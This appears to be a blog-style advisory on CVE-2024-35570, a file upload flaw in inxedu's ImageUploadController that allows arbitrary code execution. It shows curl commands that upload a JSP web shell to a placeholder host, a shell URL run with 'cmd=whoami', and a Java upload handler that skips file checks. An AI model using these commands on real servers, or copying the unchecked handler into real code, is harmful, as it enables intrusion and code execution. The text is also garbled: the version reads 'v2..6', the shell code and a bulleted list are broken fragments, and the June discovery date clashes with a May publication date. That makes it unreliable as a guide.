CVE-2024-35570 - File Upload Vulnerability in inxedu v2..6's ImageUploadController Leads to Arbitrary Code Execution

In June 2024, a critical security vulnerability identified as CVE-2024-35570 was uncovered in the open-source education platform inxedu v2..6. This bug involves an insecure file upload feature in the \controller\ImageUploadController.class component, allowing attackers to upload malicious files to the server. If successfully exploited, this flaw enables remote attackers to execute arbitrary code on the server, threatening the security of your web platform, data, and users.

This post will break down the vulnerability, explain how attackers can exploit it, and provide mitigation tips.

What is CVE-2024-35570?

CVE-2024-35570 is an _arbitrary file upload vulnerability_ in inxedu’s ImageUploadController. The vulnerability allows users to upload any file type—including server-executable files like .jsp. There are no proper checks in place to restrict file types or verify file contents. If exploited, an attacker could upload a malicious JSP web shell and gain remote code execution capability on your server.

Why is this Dangerous?

File upload vulnerabilities are among the most impactful security bugs. If an attacker can upload web shells or other code files, they typically can:

Pivot to attack further systems

With inxedu often deployed on educational or public-facing servers, this risk is magnified.

The Vulnerable Functionality

ImageUploadController.class manages image uploads for the application. However, it does not properly check:

MIME type

- File structure/content

This allows uploads of any type of file—including JSP scripts that the server may execute.

`

http://target-site.com/path/to/ImageUploadController

<%@ page import="java.io.*"%>

<%

}

%>

`bash

curl -F "file=@shell.jsp" http://target-site.com/path/to/upload

`

http://target-site.com/uploads/shell.jsp?cmd=whoami

Example Request (using curl)

curl -X POST -F "upload=@shell.jsp;type=image/jpeg" http://target-site.com/path/to/ImageUploadController

Reference Links

- NVD CVE-2024-35570 Entry
- inxedu Official GitHub
- OWASP - Unrestricted File Upload

Recent scans found no functions similar to this inxedu upload handler (simplified)

@RequestMapping("/upload")
public void upload(@RequestParam("file") MultipartFile file, HttpServletRequest request) throws Exception {
    String uploadPath = "/uploads/";
    String fileName = file.getOriginalFilename();
    File dest = new File(uploadPath + fileName);
    file.transferTo(dest);
}

What’s missing? File extension and content checks!

Store Uploads Outside Web Root

If not possible, make sure executable files are never under /uploads.

Upgrade inxedu

Keep your software updated. Follow inxedu’s security releases.

Conclusion

CVE-2024-35570 highlights the severe danger of improperly validated file uploads. If you run inxedu v2..6, patch immediately and harden your upload handling code. Arbitrary file upload bugs are straightforward to exploit and devastating in impact—but they’re also preventable with secure programming and regular updates!

Stay safe—lock down your file uploads.

*Exclusive for this post. If you have questions, contact the inxedu maintainers or review the NVD listing.*

Timeline

Published on: 05/23/2024 19:16:01 UTC
Last modified on: 08/26/2024 16:35:08 UTC